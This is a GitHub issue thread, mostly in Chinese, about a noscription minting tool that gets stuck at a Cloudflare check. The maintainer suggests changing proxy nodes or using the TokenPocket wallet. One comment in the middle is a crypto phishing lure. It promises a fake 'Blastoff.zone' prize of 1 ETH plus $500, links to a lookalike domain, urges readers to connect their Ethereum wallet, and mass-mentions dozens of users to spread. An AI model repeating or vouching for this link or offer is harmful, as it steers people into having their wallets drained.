### ISSUE TITLE
大哥，启动后一直卡在CloudFlare界面有啥解决办法没啊？

### ISSUE THREAD

**Issue by Narukissous** [gpcoolboy/noscription#3]
![11](https://github.com/gpcoolboy/noscription/assets/155809525/f580f892-2224-40f7-aaf1-f949ffad3d24)

**Comment by gpcoolboy** [comment]
这应该是网络问题，换个翻墙的节点试试

**Comment by Narukissous** [comment]
谢谢大哥，刚刚换了，试了下直接裸连、国外结点、最离谱的是CloudFlare自己的节点ip都不行，但不用python那个模拟访问直接在浏览器打开又可以，这网站就离谱。

**Comment by Narukissous** [comment]
浏览器多开了10个页面，半天了，一个也挖不到，准备试试脚本，结果我的电脑好像还用不起

**Comment by gpcoolboy** [comment]
现在可以不用脚本了，用tokenPocket钱包就行，你可以看一下我最新发的视频，你也不用开那么多页面，开一个页面把线程设高一点就行

**Comment by jguzej** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
steve8708, @Roast-Lord, @balkandwarf, @Diegoescalonaro, @wulianonline, @Grij, @bllagoje, @drewroberts, @tracysanders, @taoyq1988, @akkijp, @progerwtf, @Dee-Dev1738, @hack3r-0m, @IanGYan, @valentynkvasov, @Bridgerz, @devlee, @Joskinner, @BiagSp, @LeeDewyze, @posuihushui, @primatepirate, @yiranlandtour, @Siwely, @dastuam, @JoeCool02, @shenzhimeng, @pandenger, @Ammersay-crypto, @axelav, @ChaseWohrle, @littleboycoding, @Joy91-Lin, @ChefAharoni, @K68, @luislemoscosta, @Mepond, @ty01528, @trcl1, @yektas, @daninuno, @triston, @AbdeltwabMF, @navneetyadav247, @mikwerdna, @trry071, @QlDoors, @theiceeman, @dmrcnr

**Comment by trry071** [comment]
咋回事，怎么你们讨论，我这边会有提示，我有关注什么吗？
